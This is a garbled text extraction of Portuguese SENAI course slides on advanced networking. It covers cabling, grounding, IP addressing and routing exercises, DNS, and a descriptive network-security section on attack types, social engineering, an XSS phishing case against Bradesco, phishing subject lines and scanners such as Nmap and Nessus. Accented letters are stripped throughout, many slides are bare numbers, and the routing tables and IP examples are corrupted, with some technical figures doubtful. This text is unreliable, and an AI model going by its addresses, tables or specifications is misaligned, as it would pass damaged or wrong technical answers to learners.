Escolar Documentos
Profissional Documentos
Cultura Documentos
12/09/2009
http://www.4shared.com/file/59507480/8e48421c/ SENAI_-_CURSO_AVANCADO_REDES.html
1
Pr-requisitos:
j Conhecimentos bsicos em redes
Apresentao
j Quem sou eu? j Quem so vocs? j O que esperam da matria? j Quais as experincias em Redes? j Conhecimentos em Windows Server e/ou
Linux?
Sinopse:
I - Reviso dos Conhecimentos Bsicos de Redes: Conceitos de Redes, equipamentos, perifricos e conexo da rede II - Noes de Cabeamento Estruturado: Conhecimento de Asbuilt, certificao de uma rede, elaborao de um anteprojeto de rede, elaborao de um projeto de redes. III - Noo de Protocolo de Rede : Conhecimento da camada OSI, estudo do protocolo TCP/IP, subnet de rede, roteamento de rede IV - Redes Ponto-a-Ponto Projeto; V - Segurana de Rede: Noes de segurana fsica e lgica, objetivos, introduo a ataques, vulnerabilidade, como previnir ataques VI - Windows 2003 Server: Instalao, configurao de servios (DHCP, DNS, WINS, IIS, FTP), servidor de arquivos, servidor de Impresso, Active Direct, Segurana em nvel de recursos - Permisses de arquivos, Backup e Recuperao, Logs e Servios, Monitoramento fsico e lgico da rede VII Linux: Instalao, configurao de servios (DHCP, FTP, APACHE, SSH), Segurana em nvel de Recursos - Permisses de arquivos, Backup e Recuperao, Logs, Servios, acessos apartir de estaes Windows e Transmisso de arquivos entre windows e linux VIII - Ambiente Misto: Integrao de servios (WEB, FTP, BACKUP) entre a plataforma Windows 2003 e Linux com os clientes Windows XP
Plano de Aula:
Utilizao de Notebook e datashow e prtica nos desktops de vocs;
Avaliao:
Sero avaliaes Mensais:
Senai Apostila http://www.4shared.com/file/51511261/48a51bbd/CURSO_TCNICO_EM_INFORMTICA_-_SENAI__TURMA_AVANCADA.html Redes Avanadas Power Point http://www.4shared.com/file/59507480/8e48421c/SENAI_CURSO_AVANCADO_REDES.html Redes Bsicas Power Point http://www.4shared.com/file/72507083/506ae8fd/SENAI_-_CURSO_BASICO_DE_REDES.html Esamaz Segurana de Sistemas http://www.4shared.com/file/39802306/e79291cf/Segurana_de_sistema.html Firewall http://www.4shared.com/file/40014575/5e5292cb/Firewall.html Script Linux http://www.4shared.com/file/42267953/f6df6fc4/SCRIPT_LINUX.html Vrus http://www.4shared.com/file /42802741/12513457/virus.html Criptografia http://www.4shared.com/file/43349581/53517583/Criptografia.html Segurana de Redes http://www.4shared.com/file/54429137/c5875aa9/Seguranca_em_Redes_de_Computadores.html
Dvidas ??
Possibilitar o compartilhamento de informaes (programas e dados) armazenadas nos computadores da rede; Permitir o compartilhamento de recursos associados s mquinas interligadas; Permitir a troca de informaes entre os computadores interligados; Permitir a troca de informaes entre usurios dos computadores interligados; Possibilitar a utilizao de computadores localizados remotamente; Permitir o gerenciamento centralizado de recursos e dados; Melhorar a segurana de dados e recursos compartilhados 8
Tipos de Redes
Ponto x Ponto
Usada em redes pequenas (normalmente at 10 micros); Baixo Custo; Fcil implementao; Baixa segurana; Sistema simples de cabeamento; Micros funcionam normalmente sem estarem conectados a rede;\ Micros instalados em um mesmo ambiente de trabalho; No existe um administrador de rede; No existe micros servidores; A rede ter problemas para crescer de tamanho.
10
Cliente x Servidor
tipo de rede aparece uma figura denominada servidor. O servidor um computador que oferece recursos especializados, para os demais micros da rede, ao contrrio do que acontece com a rede ponto-a-ponto onde os computadores compartilham arquivos entre si e tambm podem estar fazendo um outro processamento em conjunto). j Outra vantagem das redes cliente/servidor a forma centralizada de administrao e configurao, o que melhora a segurana e organizao da rede.
j Deseja ter uma maior segurana na rede. (Nesse
11
Tipos de Servidores
j
Servidor de Arquivos: um servidor responsvel pelo armazenamento de arquivos de dados como arquivos de texto, planilhas eletrnicas, etc... importante saber que esse servidor s responsvel por entregar os dados ao usurio solicitante (cliente), nenhum processamento ocorre nesse servidor, os programas responsveis pelo processamento dos dados dos arquivos deve estar instalados nos computadores clientes. Servidor de Impresso: um servidor responsvel por processar os pedidos de impresso solicitados pelos micros da rede e envi-los para as impressoras disponveis. Fica a cargo do servidor fazer o gerenciamento das impresses. Servidor de Aplicaes: responsvel por executar aplicaes do tipo cliente/servidor como, por exemplo, um banco de dados. Ao contrrio do servidor de arquivos, esse tipo de servidor faz processamento de informaes. Servidor de Correio Eletrnico: Responsvel pelo processamento e pela entrega de mensagens eletrnicas. Se for um e-mail destinado a uma pessoa fora da rede, este dever ser passado ao servidor de comunicao (firewall) Servidor de Comunicao (Firewall): Usado para comunicao da sua rede com outras redes, como a Internete Se voc acessa a Internet atravs de uma linha telefnica convencional, o servidor de comunicao pode ser um computador com uma placa de modem ou conexes com ADSL ou LPCD.
12
Custo Maior desempenho do que as redes ponto-a-ponto; Implementao necessita de especialistas; Melhor desempenho que as redes ponto-a-ponto; Alta segurana; Configurao e manuteno na rede feita de forma centralizada; Existncia de servidores, que so micros capazes de oferecer recursos aos demais micros da rede
13
14
Cabeamento Estruturado
j Conector RJ45 Macho
15
Cabeamento Estruturado
j Cabo UTP
Par 1 Branco-Azul (BA) / Azul (A) Par 2 Branco-Laranja (BL) / Laranja (L) Par 3 Branco-Verde (BV) / Verde (V) Par 4 Branco-Marrom (BM) / Marrom (M)
16
Cabeamento Estruturado
Cabo UTP / CATEGORIAS
j Categoria 1 cabo de par tranado tradicional, que o utilizado para
j j
j j
telefonia (instalado antes de 1983). No recomendado para utilizao em redes locais. Categoria 2 cabo certificado para transmisso de dados (possui 4 pares tranados). Sua utilizao em redes tambm no recomendvel. Categoria 3 esta categoria suporta 10 Mbit/sec numa rede Ethernet, 4Mbit/s em uma Token Ring. Este cabo permite que at quatro telefones normais ou dois multilinhas sejam conectados ao equipamento da companhia telefnica. Categoria 4 esta categoria suporta taxas de transmisso de at 16 Mbit/s em uma rede Token Ring. Este cabo possui quatro pares. Categoria 5 possui 4 pares tranados com oito tores. Suporta taxas de transmisso de 100 Mbit/s. Sua utilizao adequada para redes Fast Ethernet e redes ATM. No incio dos anos 90, 60% dos edifcios possuam este tipo de cabo (EUA). Categoria 6 tambm possui 4 pares tranados. Suporta taxas de transmisso de at 155 Mbit/s. Sua utilizao adequada a redes Fast Ethernet para transmisso de dados e voz.
17
Cabeamento Estruturado
j Crimpador
j Testador
18
Cabeamento Estruturado
j Delay
um dos itens mais importantes, pois a estruturao fsica pode influenciar na performance e velocidade da rede. ideal que tenha o menor nmero de segmentao e quando ocorrer a segmentao que seja centralizado os servidores, pontos de sada da rede e principais clientes no switch principal.
19
Cabeamento Estruturado
j Processo da Crimpagem
20
Cabeamento Estruturado
j Crossover
- Um cabo crossover consiste na interligao de 2 (dois) computadores pelas respectivas placas de rede sem ser necessrio a utilizao de um concentrador (Hub ou Switch) ou a ligao de modems a CABO com a maquina cliente com conectores do tipo RJ45. A alterao dos padres das pinagens dos cabos torna possvel a configurao de cabo crossover ou cabo direto. A ligao feita com um cabo de par tranado (na maioria das vezes) onde se tem: em uma ponta o padro T568A, e, em outra o padro T568B (utilizado tambm com modems ADSL).
2 ponta do cabo branco laranja laranja branco verde azul branco azul verde branco marrom marrom
21
1 ponta do cabo branco verde verde branco laranja azul branco azul laranja branco marrom marrom
Cabeamento Estruturado
j 1 Prtica: Processo da Crimpagem
22
Cabo Normal
23
Cabo Crowwover
24
Cabeamento Estruturado
j Certo
j Errado
25
Cabeamento Estruturado
j O que no pode ocorrer
26
Cabeamento Estruturado
j O que no pode ocorrer
27
Cabeamento Estruturado
28
Cabeamento Estruturado
29
Cabeamento Estruturado
30
Cabeamento Estruturado
2 Prtica: Processo da Crimpagem
31
Cabeamento Estruturado
32
Cabeamento Estruturado
33
Cabeamento Estruturado
34
Cabeamento Estruturado
35
Cabeamento Estruturado
36
37
38
seguintes: Entre terra e fase = 117 V Entre neutro e fase = 115 V Entre terra e neutro = 2,5 V(valor Maximo tolerado)
39
40
Aterramento
totalmente independente dos demais terras existentes. j Observando o seguinte na instalao: Ser construdo distncia mnima de 2,40m dos outros terras do quadro e do neutro e a uma distncia mnima de 25,00 do terra de pra-raios. O cabo que liga as barras de aterramento ao quadro deve ser encapado, possuir bitola compatvel com a distancia entre o sistema e o quadro, e NO DEVER ESTAR NUNCA CONECTADO AO NEUTRO.No so aconselhveis distncias maiores que 50m entre o terra e o quadro de distribuio.
41
Aterramento
j Material necessrio para um aterramento simples:
- 3 barras de cobre, com 2 a 3 metros de comprimento e 15cm de dimetro. - 6 abraadeiras de bronze para as barras de cobre. - 10 metros de fio isolado, de bitola idntica dos fios fase e neutro. - Sal grosso, carvo vegetal e enxofre em quantidades suficientes para cobrir o poo dos eletrodos. - gua destilada suficiente para regar a mistura. - As barras de cobre so chamadas eletrodos de aterramento; do uma referncia de terra de 0 volte uma conexo terra para descargas eltricas atmosfricas. Tambm fornecem uma trajetria de impedncia baixa terra ( valor mximo de 25 ohms).
42
Aterramento
43
Aterramento
j Consequncias da falta de aterramento:
- Apario de BAD CLUSTERS no HD ou at mesmo a perda total. Isto no demora a acontecer. - Voc poder perder seu HD em 2 ou 3 meses. - Danos na placa me. - Danos na memria, que podem vir a causar perda repentina de dados e ou congelamento de todo o sistema.
44
j Lgicamente:
- Software Inventrio; - Help Desk;
(http://www.softwarepublico.gov.br/spb/vercomunidade?community_id=3585) (http://ocomonphp.sourceforge.net/) (Network supervisor 3COM)
- Analyzer Network;
queremos e no vamos formar engenheiros aqui, nossa inteno e mostrar que uma documentao bem feita pode ser o diferencial dentro desta rea , o projeto pode ser escrito, no necessariamente um desenho, lgico que se possuir o desenho muito melhor, mesmo porque hoje existem ferramentas para auxiliar neste propsito.
46
47
do servio;
48
49
50
Viso Macro
Survey):
As paredes externas so de cermico aparente e as paredes internas, incluindo as salas laterais , de reboco liso e pintado; O teto de forro falso e o piso de granito natural; O departamento de telemarketing possui divisrias baixas acsticas em formas de baias, de madeira, revestida com espuma de poliuretano e tecido grosso; Toda iluminao feita com luminrias com 4 lmpadas fluorescentes de 40 W x 220 V e localizada no centro geomtrico de cada ambiente; Altura entre o forro e o piso de 2,6m; A sala de treinamento, recebe freqentemente pessoas no ligadas a empresa, alm disso seu layout constantemente alterado;
52
53
54
Protocolos - Definio
56
A Mensagem em Camadas
Remetente
Mensagem Escrita
-Voc tem uma idia e deseja comunica-la a outra pessoa -Tem de escolher a forma de expressar essa idia -Voc decide como de uma forma apropriada -Enfim, de fato expe sua idia Rodovia/Malote
Destinatrio
Mensagem Escrita
Envelope Agncia
Envelope Agncia
Protocolo TCP/IP
O que configurar ?
j IP j MASCARA j GATEWAY j DNS
59
IP e MASCARA
61
Endereos IP
j Endereo IP: Indentificador de Rede +
Indentificador de HOST
Endereo IP de it
Identificador da rede
Identificador do o t
host
RE E
internet
REDE
62
63
00.0.0.
00.0.0.
00.0.0.
00.0.0.
00.0. .
O rot
00.0. .
or ossui ois
00.0. .
r os I , um r
00.0. .
r .
64
Conflito de IP: Ocorre quando um IP manual atribudo mquina e j existe outro computador na rede com o mesmo IP. Nesse caso, a tela do Ipconfig deve se parecer com a seguinte:
Note que os campos IP e Mscara de Subrede esto zerados. Essa a principal caracterstica de um conflito de IPs. - Configurao incompleta: Certifique-se de que os campos DNS Servers e Default Gateway no esto em branco.
j
configurados, o computador somente poder enviar e receber dados dentro da rede local e com outros computadores
TELNET: Tem como funo testar se o servio est ativo. Para fazer isso, entre em um Prompt de Comando e digite: telnet IP PORTA_SERVICO. Este Teste serve tanto se voc local ou remoto da mquina que est provendo o servio.
GATEWAY
71
Roteamento Indireto
j Origem e Destino esto em redes
diferentes
1 .35.143.1
Tabela de Roteamento Destino 1 .35.143. . . . Gateway DIRETO 1 .35.143.1 REDE 1 .35.144. 1 .35.144.15
1 .35.143.1
Router
REDE 1 .35.143.
1 .35.144.1
Tabela de Roteamento Destino 1 .35.143. 1 .35.144. ....... Gateway 1 .35.143.1 1 .35.144.1 .......
Exemplo de roteamento
Exe plo de a rede Intranet constit da de duas redes fsicas conectadas por u roteador.
192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.4
re e 192.168.0.x
re e 192.168.1.x
servi or
192.168.1.1
192.168.1.2
192.168.1.3
192.168.1.4
Tabelas de Roteamento
INTERNET
REDE 200.17.98.X
roteador 1 roteador 2
REDE 200.134.51.X
Exerccio 1
j Construa a tabela de roteamento do Roteador 1
200.0.0.1
INTERNET
3 1
200.17.98.1 200.134.51.1
2
200.17.98.0 255.255.255.0 200.17.98.23
INTERNET
76
TABELA DE ROTEAMENTO
Rede Destino Mascara Gateway Interface Custo
77
TABELA DE ROTEAMENTO
Rede Destino 200.134.51.0 200.17.98.0 0.0.0.0 0.0.0.0 Mascara
255.255.255.0 255.255.255.0
Gateway
200.134.51.1
Interface
200.134.51.1
C sto 1 1 1 2
200.17.98.1
200.17.98.1
0.0.0.0 0.0.0.0
200.0.0.1
200.17.98.23
200.0.0.2
200.17.98.1
Exerccio 2:
j Utilizando a classe C: 200.0.0.0 (255.255.255.0)
A) distribua os IPs nas duas redes abaixo B) defina a tabela de roteamento do roteador 1.
1
100 computadores 100 computadores
INTERNET
79
DNS
80
Nomes Hierrquicos
Agrupa nomes em domnios. A rvore de nomes armazenada num banco de dados distribudo distribudo.
j Especificaes do DNS RFCs 1033, 1034, 1034, 1101, 1123, 1183 e 1536.
Expecificaes da Internet Task Force
www.cade.com www.oi.com
www. fg.br = 20.20.20.80 www.av.com=50.75.96.8
83
Elaborao de Projeto
84
Elaborao de Projeto
j Criar uma formulrio / checklist de
Qual a finalidade ? Quem vai acessar (de onde, como, que soluo) ? Quantos computadores ? De onde vai ser o acesso ? Qos? Local Fsico (disponibilidade para cabeamento)
85
tombada pelo patrimnio histrico; Acesso de usurio em uma rede local e clientes via Web (internet); Acesso de funcionrios a pastas especficas de arquivos, assim como acesso ao sistema corporativo; 500 computares (300 comp. Em uma casa e 200 em outra); No posso para meu acesso nem por 1 minuto 86
V - Segurana de Redes
88
O sistema informtico mais seguro no utilizvel O sistema informtico mais utilizvel inseguro S existe um computador 1 seguro, o desligado. %
89
Introduo
j A Segurana da Informao pode ser
definida como a proteo de dados contra a revelao acidental ou intencional a pessoas no autorizadas, e contra alteraes no permitidas.
divide-se em:
90
Introduo (cont.)
j Objetivo da Segurana Informtica Seja qual for a dimenso de um sistema informtico, deve procurar-se atingir, na sua explorao, os seguintes objetivos:
Integridade do equipamento Confidencialidade e a qualidade da informao Prontido do sistema (eficincia x eficcia)
91
92
Objetivos da Segurana
j O objetivo da segurana da informao
abrange desde uma fechadura na porta da sala de computadores at o uso de tcnicas criptogrficas sofisticadas e cdigos de autorizao. j O estudo no abrange somente o crime computacional (hackers), envolve qualquer tipo de violao da segurana, como erros em processamento ou cdigos de programao.
94
Objetivos da Segurana
Segurana no uma tecnologia
Objetivos da Segurana
j A segurana de dados tem por objetivo
restringir o uso de informaes (softwares e dados armazenados) no computador e dispositivos de armazenamento associados a indivduos selecionados.
96
Deve-se preserv-lo protegendo-o contra revelaes acidentais, erros operacionais e contra as infiltraes que podem ser de dois tipos:
Ataques passivos (interceptao) Ataques ativos (interrupo, modificao e Fabricao)
97
Ataques passivos
Ataques Passivos
Intercepo
Anlise do trfego
O objetivo obter informao que est a ser transmitida. Este tipo de ataques muito difcil de detectar. O esforo de proteco deve ser no sentido da preveno.
Ataques Passivos
j Anlise do contedo das mensagens Escutar e
entender as informaes.
origem e identidade das comunicaes e pode observar a frequncia e comprimento das mesmas. Esta informao pode ser til para determinar a natureza da comunicao. Os ataques passivos so muito difceis de detectar porque no envolvem nenhuma alterao de dados. A nfase ou o esforo deve desenvolvido no sentido da preveno e no da deteco.
Intercepo
Emissor
Receptor
Intercepo
Intercepo Quando utilizadores no autorizados conseguem aceder a recursos para os quais no estavam autorizados. um ataque confidencialidade. A parte no autorizada pode ser uma pessoa, um programa ou um computador. Exemplos: violao de cabos de comunicao, para capturar dados da rede, cpia ilcita de pastas e programas, etc.
Ataques Ativos
Ataques Ativos
Interrupo (Disponibilidade)
Modificao (Integridade)
Fabricao (Autenticidade)
j Envolvem alguma modificao de dados. j Este tipo de ataques muito difcil de prever, j que, para isso,
seria necessrio uma proteo completa de todos os tipos de comunicaes e de canais. Por esta razo, o esforo de proteco deve ser no sentido de os detectar e recuperar dos atrasos ou estragos entretanto causados.
Interrupo
Emissor
Receptor
Interrupo
Modificao
Emissor
Receptor
Modificao
Modificao uma parte no autorizada, no s acede informao, mas tambm a modifica. um ataque de integridade. Exemplos: alterao de valores num ficheiro de dados; alterao de um programa para que ele funcione de maneira diferente ou modificao do contedo de mensagens transmitidas pela rede.
Fabricao
Emissor
Receptor
Fabricao
Fabricao uma parte no autorizada insere dados falsos no sistema. um ataque autenticidade. Exemplos: insero de mensagens simuladas na rede ou a adio de registos a um ficheiro.
O que ataque?
Ataque toda ao realizada com intuito ou no de causar danos.
105
Vulnerabilidades
j Todo computador vulnervel a
Vulnerabilidades Fsicas (Meio, Construo) Vulnerabilidades Naturais (Desastres Naturais) Vulnerabilidades de Hardware e Software(Falhas) Vulnerabilidades de Media (Roubos de Media) Vulnerabilidades de Comunicao (Hacker) Vulnerabilidades de Humanos (Usurios) Vulnerabilidades sobre Exploit (Brechas, Copias)
Um ataque tpico
107
Anatomia de um ataque
Varredura Reconhecimento
Enumerao Escalando privilgios Instalao de back doors Negao de Servios Acesso informao Ocultao de rastros
Invaso
109
110
112
114
Caso Real
Caso Real
Perfil do Fraudador*: 68% esto na Mdia e Alta Gerncias 80% tem curso superior completo Predominantemente do Sexo Masculino Idade mdia entre 31 e 40 anos
*Pesquisa sobre crimes econmicos - PWC 05
117
118
119
120
121
122
123
124
Bocal preparado
125
126
128
129
130
131
132
133
identifica como vice-diretor da empresa. Voc j o viu pelos corredores, mas nunca falou com ele por telefone. Ele informa que se encontra na filial da empresa, em reunio, e est com problemas para acessar o sistema. Assim sendo, solicita a senha para que possa ter acesso. Informa, ainda, que est acompanhado de 10 pessoas que possuem outros compromissos e que no podem esperar por muito tempo.
134
135
Servio inexistente
Ameaas
Erro de portugus
Dvida inexistente
Erro de portugus
Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisainst-xss/) Criminosos brasileiros conseguiram descobrir um problema em uma pgina do Bradesco que permitia que a mesma fosse alterada por meio de links, possibilitando o uso do domnio do banco para todo tipo de atividade maliciosa. Para tal, crackers enviaram e-mail em massa contendo um link que explorava uma falha de XSS (Cross Site Scripting) existente em uma pgina localizada em institucional.bradesco.com.br. Se clicado, o link enviava informaes pgina que causavam um comportamento indesejvel, fazendo com que argumentos da query string como chamada a parte do link depois do ponto de interrogao (asp?) fossem inseridas como cdigo, permitindo o ataque. Dias antes da publicao desta matria, a Linha Defensiva notificou o Bradesco. O banco removeu a pgina vulnervel dentro de aproximadamente 48 horas, inutilizando o ataque. A mensagem contendo o link que explorava a brecha solicitava o recadastramento das chaves de segurana usadas nas transaes atravs da Internet, convidando o usurio a faz-lo por meio do link.
142
Como demonstrado na imagem, a maioria dos navegadores e os programas de e-mails no exibem o endereo completo de uma URL, se esta for muito extensa, no permitindo que a existncia do golpe seja percebida. Embora o e-mail tenha usado uma tcnica refinada que facilmente poderia enganar at mesmo usurios com certa experincia, devido ao link camuflado, erros de ortografia caractersticos de golpes e fraudes se faziam presentes. Aparentemente, o sistema de email em massa usado pelos criminosos no era compatvel com caracteres especiais, como acentos.
143
Ao acessar o link, o internauta era direcionado para uma pgina do Bradesco (Index_Pesquisa.asp) que, vulnervel a XSS, carregava outra pgina, hospedada em um domnio brasileiro (cujo nome no foi divulgado por se tratar de um domnio legtimo comprometido). Em ataques XSS, pginas legtimas so usadas de forma maliciosa e um cdigo (no caso acima, um FRAMESET1) inserido na pgina legtima. O contedo da pgina ser, portanto, diferente do esperado. 145
Amores On-line - carto virtual - Equipe Carteiro Romntico - Uma pessoa que lhe admira enviou um carto As fotos que eu tinha prometido. lbum pessoal de fotos AVG Antivrus - Detectamos que seu E.Mail est enviando mensagens contaminadas com o vrus w32. bugbear Aviso - voc est sendo trado - veja as fotos Aviso - voc est sendo trado - veja as imagens do motel Banco do Brasil informa - Sua chave e senha de acesso foram bloqueados Contrato Pendente - Clique para fazer atualizao Big Brother Brasil - ao vivo - quer ver tudo ao vivo e ainda concorrer a promoes exclusivas? Clique na fechadura Cmara dos Dirigentes Lojistas - SPC - Servio de Proteo ao Crdito Notificao - Pendncias Financeiras - Baixar o arquivo de relatrio de pendncias. carnaval 2005 - veja o que rolou nos bastidores do carnaval de So Paulo Carto Terra - eu te amo - webcard enviado atravs do site Cartes Terra Carto UOL - I love you - voc recebeu um carto musical - Para visualizar e ouvir escolha uma das imagens Cartes BOL - Voc recebeu um carto BOL Cartesnico.com - Seu amor criou um carto para voc Checkline - Consultas de crdito on-line - Consultas no Serasa/SPC Claro Idias - Grande chance de ganhar meio milho de reais em ouro e 18 carros Colaneri e Campos Ltda - Ao Gerente de Vendas - oramento de material e equipamentos em urgncia
Correio Virtual - hi5 - Seu Amor te enviou este carto CPF cancelado ou pendente de regularizao - verifique; seu CPF est cancelado Declarao de Imposto de Renda de 2005/06 - Ministrio da Fazenda - CPF Cancelado ou Pendente de Regularizao Ebay - your account could be suspended - Billing Department Embratel - Comunicado de Cobrana - Aviso de Bloqueio Embratel - Notificao Confidencial - Fatura de servios prestados Clique para detalhamento da fatura Emotion Cards - UOL - Parabns voc recebeu um Presente Virtual Febraban - Guia de Segurana - Febrasoft Security Finasa - Nossa Caixa - Fraudes Bancrias - Febraban Fininvest - dbito em atraso - pendncias financeiras em seu CPF/CNPJ Ganhe uma viagem a Paris - Guia Paris Lumire Gmail - Gmail Amigo Oculto - Baixar Formulrio - E-mail de 1 Giga Humortadela - Piada animada sempre amigos Humortadela - voc 10 - acesse o link e sacaneie Humortadela - voc recebeu uma piada animada - Ver Piada Animada Ibest - acesso grtis e fcil - discador ibest - 0800 conexo sem pulso telefnico. Grtis - Download Larissa 22 aninhos - www. mclass. com. br - clique aqui e veja o vdeo Leiam esta informao IMPORTANTe Martins Com Ltda - Setor de Compras - Oramento Mercado Livre - Aviso - Saldo devedor em aberto na sua conta - e pagamento no for quitado acionaremos departamento jurdico
Ol, h quanto tempo! Eu me mudei para os Estados Unidos, e perdemos contato... Olha o que a Globo preparou para voc neste ano de 2005 - Big Brother Brasil 5 - Baixe o vdeo Overture - Promoo para novos assinantes - Tem cliente procurando, tem voc oferecendo, vamos juntar os dois. Seja encontrado por quem quer comprar Paparazzo - globo. com - se voc gostou de uma espiada no vdeo Parperfeito - Voc foi adicionado aos prediletos - Associado do Par Perfeito Passe Livre de 7 dias no Globo Media Center Promoo Fotolog.net e UBBI - sorteio de 10 Gold Cam por dia - Crie seu fotolog e concorra Radio Terra - dedique uma msica Receita Federal - CPF cancelado ou pendente de regularizao Saudades de voc - Sou algum que te conheceu h muito tempo, e tive que fazer uma viagem - Espero que goste das fotos SERASA - pendncias referentes a seu nome - Extrato de dbito SERASA - Regularize seu CPF ou CNPJ - clique para extrato de dbitos Sexy Clube - Thaty Rio - Direto do Big Brother - Veja as fotos em primeira mo Sou um amigo seu - voc est sendo trado - veja as fotos Symantec - Faa sua atualizao do Norton 2005 aqui - Gratuita - Licena para 1 ano grtis Terra Cartes - O meu melhor presente voc Tim ps pago - pendncias no SPC - Sistema de Proteo aoCrdito - Serial do Celular
Microsoft - Ferramenta de remoo de softwares Mal-Intencionados do Microsoft Windows - Windows XP fica a cara de quem recebe um carto Voxcards Microsoft Software - Este contedo foi testado e fornecido a voc pela Microsoft Corporation - Veja as novidades Music Cards - Confirmao Necktsun Comrcio Ltda - Palmas - Departamento de Vendas - Oramento Netcard Cartes Virtuais - Emoes de verdade Norton Antivrus - Alerta de Segurana - download do antdoto para o Ms. Bruner Notificao Confidencial - Pendncias Financeiras em seu CPF O carteiro - voc recebeu um carto de quem te admira O carteiro. com - tenho uma novidade para voc - veja o carto que preparei Voxcards - carto voxcards - para quem voc vai mandar um carto hoje? Voxcards - mensageiro - voc est recebendo um carto virtual voxcards Precisa instalar o plugin - clique para instalar Webcard Terra - Feliz Dia das Mes - Existe um presente especial esperando por voc no site de cartes do terra. Week - Complimentary Subscription Confirmation - Free - Please Apply online PC Week www. symantec. com - A soluo Antivrus mais confivel do mundo www.microsoft. com - Proteja seu computador com antivrus
UOL - Promoo Cultural - Cara cad meu carro UOL Cartes - Estou com saudades - clique para visualizar UOL Cartes - Seu amor lhe enviou um carto - clique para baixar UOL Cartes - Voc recebeu um lindo carto virtual Veja as fotos proibidas das musas do bbb5 Viagens contaminadas com o w32. bugbear Virtual Cards - Um grande abrao da equipe virtual cards - ler carto VIVO - Torpedos Web Gratuito - Torpedo Fcil Vivo Yahoo Cartes - Voc tudo para mim - clique na imagem Yahoo Cartes - Voc tudo para mim - enviado por quem te admira Outra dica importante: nunca abra E-Mails de remetentes desconhecidos! Sempre desconfie de E-Mails que solicitam 'clique aqui' ou ' acesse o link (tal)' ou ' veja minha foto' ou ' te encontrei , lembra-se de mim? ' ou ' ligue-me para sairmos' , etc... E, finalmente, para ter certeza que de um golpe que voc est sendo vtima, passe o mouse - sem clicar - pela palavra do direcionamento : voc vai ver, na barra inferior - esquerda da tela -, que se trata de um arquivo com a terminao 'exe' ou 'scr' ou outra. Arquivo este(s) que vai (vo) espionar seu computador, roubando seus dados, senhas, etc.
Um estudo conduzido pela Symantec mapeou o mercado negro de dados. O relatrio traz o preo das informaes negociadas por criminosos e mostra como as empresas podem ter prejuzos com a vulnerabilidade dos dados dos clientes.
Segundo Marcelo Silva, diretor de servios da companhia no Brasil, j existe um ecossistema criado em torno do roubo de dados. Quem rouba nem sempre vende os dados. A gente fala de crime organizado, mas o que existe um grande mercado, afirma o executivo. Veja tabela com o preo dos dados no mercado negro:
j
Produto Contas bancrias Cartes de crdito Identidades completas Contas do eBay Senhas de e-mail Proxies
Preo de 10 dlares a mil dlares de 0,40 dlar a 20 dlares de 1 dlar a 15 dlares de 1 dlar a 18 dlares de 4 dlares a 30 dlares de 1,5 dlar a 30 dlares
CW Connect - No grupo de discusso sobre Crimes Digitais do CW Connect, a primeira rede social para profissionais de tecnologia da informao e telecomunicaes do mercado, uma das participantes - a analista Fabiana inseriu uma pesquisa sobre as principais ameaas s informaes da empresa: 1 - Vrus 75% (Por falta de conhecimento os usurios baixam programas sem conhecimento, acessam sites suspeitos, etc) 2 - Divulgao de senhas 57% 3 - Hackers 44% 4 - Funcionrios insatisfeitos 42% 5 - Acessos indevidos 40% 6 - Vazamento de informaes 33%
152
Custo de Segurana:
154
155
At alizao do ambiente
Q ando as ameaas ocorrem?
Produto Lanado
At alizao do ambiente
Tempo para a invaso dimin indo
Invaso
331 O tempo (em dias) entre a 18 disponibilizao da Produto 0 151 Vulnerabilidade Fix Fix instalado Lanado descoberta disponvel e a invaso pelo cliente correo 25 tem diminudo, 14 portanto a aplicao Nimd SQL Welchia Blaste Sasser de patches no pode a Slamm / Nachi r er ser a nica defesa em grandes empresas
Atualizao do ambiente
Worm Zotob
j 09/08 - A Microsoft
publica a correo
j 11/08 - A Microsoft
so atacadas
Principais Ameaas
Principais Obstculos
Anlise de Segurana
So falhas em servios, aplicativos e sistemas operacionais que pode acarretar acesso ao sistemas parcial ou total em nvel de administrao. j Hoje temos ferramentas de escaneamento de vulnerabilidades que detecta falhas de sistemas, mais tambm so utilizadas para invaso. j Segundo o site sectools.org temos as 10 principais ferramentas de escaneamento de vulnerabilidades de sistemas. Nessus, GFI LANguard, Retina, Core Impact, ISS Internet Scanner, X-scan, Sara, QualysGuard, SAINT, MBSA
j
161
164
j NMAP (comandos)
Mtodo de deteco remota de vulnerabilidades Aplicaes como o NMAP no tiram concluses Existe outro tipo de aplicao que efectua o levantamento remoto de recursos, detecta vulnerabilidades, alerta o utilizador ou lana ataques NESSUS (Nessus Security Scanner) uma ferramenta sofisticada que funciona de forma semiautomtica Pode ser usada para obter relatrios de segurana informtica Tambm pode ser utilizada para atacar uma plataforma Incorpora ataques de negao de servio, teste de exploits, etc Facilita muito a actividade dos crackers
168
169
170
171
j NESSUS
172
173
VRUS
Tipos de Virus
Um dos primeiros tipos de vrus conhecido, o vrus de boot infecta a partio de inicializao do sistema operacional. Assim, ele ativado quando o computador ligado e o sistema operacional carregado. j Time Bomb Os vrus do tipo "bomba de tempo" so programados para se ativarem em determinados momentos, definidos pelo seu criador. Uma vez infectado um determinado sistema, o vrus somente se tornar ativo e causar algum tipo de dano no dia ou momento previamente definido. Alguns vrus se tornaram famosos, como o "Sexta-Feira 13" e o "Michelangelo". Minhocas, worm ou vermes Com o interesse de fazer um vrus se espalhar da forma mais abrangente possvel, seus criadores por vezes, deixaram de lado o desejo de danificar o sistema dos usurios infectados e passaram a programar seus vrus de forma que apenas se repliquem, sem o objetivo de causar graves danos ao sistema. Desta forma, seus autores visam tornar suas criaes mais conhecidas na Internet. Este tipo de vrus passou a ser chamada de verme ou worm. Eles esto mais aperfeioados, j h uma verso que ao atacar a mquina hospedeira, no s se replica, mas tambm se propaga pela internet pelos e-mail que esto registrados no cliente de e-mail, infectando as mquinas que abrirem aquele e-mail, reiniciando o ciclo
j Vrus de Boot
